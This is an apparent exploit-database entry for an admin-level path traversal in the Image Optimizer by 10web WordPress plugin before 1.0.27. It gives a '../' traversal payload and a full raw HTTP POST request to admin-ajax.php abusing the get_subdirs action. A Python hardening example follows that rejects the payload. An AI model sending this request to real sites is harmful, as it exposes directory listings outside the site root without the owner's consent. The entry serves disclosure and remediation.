wpexploit | Chien Vuong | WPEX-ID:44024299-BA40-4DA7-81E1-BD44D10846F3
History: May 02, 2023 - 12:00 a.m.

Image Optimizer by 10web < 1.0.27 - Admin+ Path Traversal

2023-05-02 00:00:00
Chien Vuong
Tags: image optimizer, 10web, admin+ path traversal, payload, http, csrf, exploit

EPSS: 0.001 (Percentile: 23.5%)

The plugin does not sanitize the dir parameter when handling the get_subdirs AJAX action, allowing high-privileged users such as admins to list the names of files and directories outside of the site's root.

- Payload: ../../../../../../../../../../../../../../../../../../../
- In the "Other directory" function, select a directory, then in the "dir" parameter add the payload: ../../../../../../../../../../ ../ ../../../../../../../../../../..

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 102
Cookie: [Admin+]

action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../
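The missing check described above, shown as an added example in Python rather than the plugin's PHP (not the plugin's own code): the untrusted dir value is canonicalised with realpath and rejected unless it still resolves inside the site root, which is what stops the payload from this report. The function names and the temporary directory layout are assumptions made for the demonstration.

```python
import os
import tempfile
from typing import List, Optional


def safe_subdir(site_root: str, requested: str) -> Optional[str]:
    """Resolve the untrusted `dir` parameter against site_root.

    Returns the canonical absolute path when it stays inside site_root,
    otherwise None. Hypothetical hardening for a get_subdirs-style handler.
    """
    root = os.path.realpath(site_root)
    # Strip leading separators so an absolute value cannot replace the root,
    # then canonicalise: realpath collapses "..", "." and symlinks, so the
    # comparison is made on the real target rather than the textual string.
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/\\")))
    # commonpath (not startswith) so /var/www does not accept /var/www2.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def list_subdirs(site_root: str, requested: str) -> Optional[List[str]]:
    """Hardened equivalent of the get_subdirs action: names of sub-directories only."""
    target = safe_subdir(site_root, requested)
    if target is None or not os.path.isdir(target):
        return None
    return sorted(
        name for name in os.listdir(target)
        if os.path.isdir(os.path.join(target, name))
    )


# The dir value from the report above, used here as the rejected input.
PAYLOAD = "../../../../../../../../../../../../../../../../../../../"


def demo() -> dict:
    # Constructed site root: a temp dir standing in for the WordPress install.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        os.makedirs(os.path.join(root, "wp-content", "plugins"))
        return {
            "legit": list_subdirs(root, "wp-content"),        # ['plugins', 'uploads']
            "traversal": list_subdirs(root, PAYLOAD),         # None
            "nested_escape": list_subdirs(root, "wp-content/../.."),  # None
        }


if __name__ == "__main__":
    print(demo())
```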
